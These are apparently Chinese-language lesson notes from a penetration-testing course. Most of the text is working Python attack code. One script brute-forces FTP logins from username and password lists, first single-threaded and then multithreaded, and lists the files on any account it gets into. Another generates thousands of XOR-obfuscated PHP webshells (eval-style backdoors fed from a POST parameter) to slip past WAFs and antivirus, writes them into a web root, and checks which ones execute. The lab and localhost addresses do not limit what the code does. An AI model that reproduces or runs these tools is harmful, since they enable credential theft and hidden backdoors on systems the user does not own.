本课知识点:
- 协议模块使用,Request爬虫技术,简易多线程技术,编码技术,Bypass后门技术
学习目的:
- 掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合Fuzz吊打WAF等
案例1:简单多线程技术实现脚本
- queue,threading模块使用
案例2:利用FTP模块实现协议爆破脚本
- 1.ftplib模块使用
- 2.遍历用户及密码字典
- 3.尝试连接执行命令判断
# Author:Serena import ftplib #简单的模拟登录测试 #爆破:IP、端口、用户名、密码字典 def ftp_brute(): ftp = ftplib.FTP() for username in open('ftp-user.txt'): for password in open('ftp-pwd.txt'): username = username.replace(' ','') password = password.replace(' ','') # print(username+'|'+password) try: ftp.connect('192.168.56.110', 21) ftp.login(username,password) print(username+'|'+password+'| ok') list = ftp.retrlines('list') #此时可以获得当前ftp目录下的所有文件的信息 print(list) except ftplib.all_errors: pass if __name__ == '__main__': ftp_brute()
# Author:Serena import ftplib,sys,queue,threading #简单的模拟登录测试 #爆破:IP、端口、用户名、密码字典 import queue import threading def ftp_brute(ip,port): ftp = ftplib.FTP() ftp.connect(ip,port) while not q.empty(): dict = q.get() dict = dict.split('|') username = dict[0] password = dict[1] try: ftp.login(username,password) print(username+'|'+password+'| ok') list = ftp.retrlines('list') #此时可以获得当前ftp目录下的所有文件的信息 print(list) except ftplib.all_errors: print(username + '|' + password + '| no') pass if __name__ == '__main__': ip = sys.argv[1] port = int(sys.argv[2]) userfile = sys.argv[3] passfile = sys.argv[4] threading_num = int(sys.argv[5]) q = queue.Queue() for username in open(userfile): for password in open(passfile): username = username.replace(' ','') password = password.replace(' ','') # print(username+'|'+password) q.put(username + '|' + password) for x in range(threading_num): t = threading.Thread(target=ftp_brute,args=(ip,port)) t.start() # 命令行执行:python3 test.py 192.168.56.110 21 ftp-user.txt ftp-pwd.txt 10 # 可以再优化一下:检测到争取的用户名密码后停止
案例3:配合Fuzz实现免杀异或shell脚本
- 1.免杀异或shell原理讲解及开发思路(参考及举例:!^@,"^?等)
- 2.基于Fuzz思路生成大量Payload代码并有序命名写入网站文件中
- 3.基于多线程实现批量访问shell文件并提交测试是否正常连接回显
# Author:Serena import time import requests import threading,queue def bypass_check(): while not q.empty(): filename = q.get() url = "http://127.0.0.1:8081/x/" + filename datas = { 'x ': 'phpinfo();' } result = requests.post(url, data=datas).content.decode('utf-8') if "XIAODI-PC" in result: print('check ->' + filename+'->ok') else: print('check ->' + filename + '->no') time.sleep(1) if __name__ == '__main__': q = queue.Queue() for i in range(1,127): for ii in range(1, 127): payload = "'" + chr(i) + "'" + "^" + "'" + chr(ii) + "'" code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>" filename = str(i) + 'xd' + str(ii) + '.php' q.put(filename) with open('D:/phpstudy/WWW/x/' + filename, 'a+') as f: f.write(code) print("Fuzz文件生成成功") for x in range(20): t = threading.Thread(target=bypass_check) t.start()
涉及资源:
- fuzzdb(https://github.com/zhanye/fuzzdb)
- fuzzDicts(https://github.com/stemmm/fuzzDicts)
- Webshell免杀绕过waf(https://www.cnblogs.com/liujizhou/p/11806497.html)
- python ftplib模块(https://www.cnblogs.com/kaituorensheng/p/4480512.html)
- PHP异或(https://blog.csdn.net/qq_41617034/article/details/104441032)
- https://pan.baidu.com/s/13y3U6jX3WUYmnfKnXT8abQ,提取码:xiao